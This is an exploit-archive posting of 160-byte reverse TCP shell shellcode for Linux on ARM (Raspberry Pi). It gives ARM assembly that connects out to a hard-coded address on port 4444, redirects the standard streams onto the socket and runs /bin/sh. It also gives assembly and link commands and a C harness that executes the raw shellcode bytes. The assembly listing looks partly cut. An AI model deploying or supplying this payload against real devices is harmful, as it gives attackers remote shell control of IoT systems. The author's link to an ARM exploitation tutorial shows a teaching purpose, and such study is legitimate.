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Linux/ARM (Raspberry Pi) Reverse TCP Shell Shellcode

Linux/ARM (Raspberry Pi) Reverse TCP Shell Shellcode
Posted Sep 10, 2017
Authored by Andrea Sindoni

160 bytes small Linux/ARM Raspberry Pi reverse TCP /bin/sh shellcode that connects to port 4444.

tags | tcp, shellcode
systems | linux
SHA-256 | d39c6fb0779cbfe35e7e33db8b14d9e3fa7865730dbe954dd0421c6645c5a5af

Linux/ARM (Raspberry Pi) Reverse TCP Shell Shellcode

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# Andrea Sindoni - @invictus1306 #

This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/

Enviroment: Raspberry pi 3

Default settings for port:4444 ip:

.global _start

mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
ldr r2, =#0x0c00a8c0 @ sin_addr= each octet is represented by one byte -- please change me
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct

mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#283 @ connect syscall
swi 0

@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
mov r0, r6 @ mov sockfd into r0
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop

@ int execve(const char *filename, char *const argv[],char *const envp[]);

mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0

mov r0, #0
mov r7, #1
swi 0 @ exit(0)

shell: .asciz "/bin/sh"

Assemble and link it:
as -o reverse_shell.o reverse_shell.s
ld -o reverse_shell reverse_shell.o

#include <stdio.h>

char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";

int main(void) {
(*(void(*)()) code)();
return 0;

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